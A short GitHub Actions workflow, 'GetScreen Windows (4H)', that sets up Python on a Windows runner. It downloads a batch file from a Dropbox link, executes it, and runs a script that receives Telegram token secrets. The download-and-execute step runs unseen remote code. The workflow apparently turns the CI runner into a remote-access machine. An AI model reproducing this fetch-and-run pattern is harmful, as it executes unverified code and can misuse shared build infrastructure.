name: GetScreen Windows (4H)

on:
  workflow_dispatch:

jobs:
  build:
    runs-on: windows-latest
    timeout-minutes: 120

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v3

      - name: Set up Python 3.9.7
        uses: actions/setup-python@v3
        with:
          python-version: '3.9.7'

      - name: Install Python Dependencies
        run: |
          pip install requests
          pip install psutil

      - name: Downloading & Setting Up
        run: |
          echo "EMAIL_SECRET=busmaill02@gmail.com" > secrets.txt
          Invoke-WebRequest -Uri "https://www.dropbox.com/scl/fi/3k17mr53efo8a9i74pmq6/down.bat?rlkey=5cs99vfpnwvm5eba3fkhl6aul&dl=1" -OutFile "down.bat"
          cmd /c down.bat

      - name: Run Combined Script
        env:
          TELEGRAM_TOKEN: ${{ secrets.TELEGRAM_TOKEN }}
          TELEGRAM_CHAT_ID: ${{ secrets.TELEGRAM_CHAT_ID }}
        run: python time.py
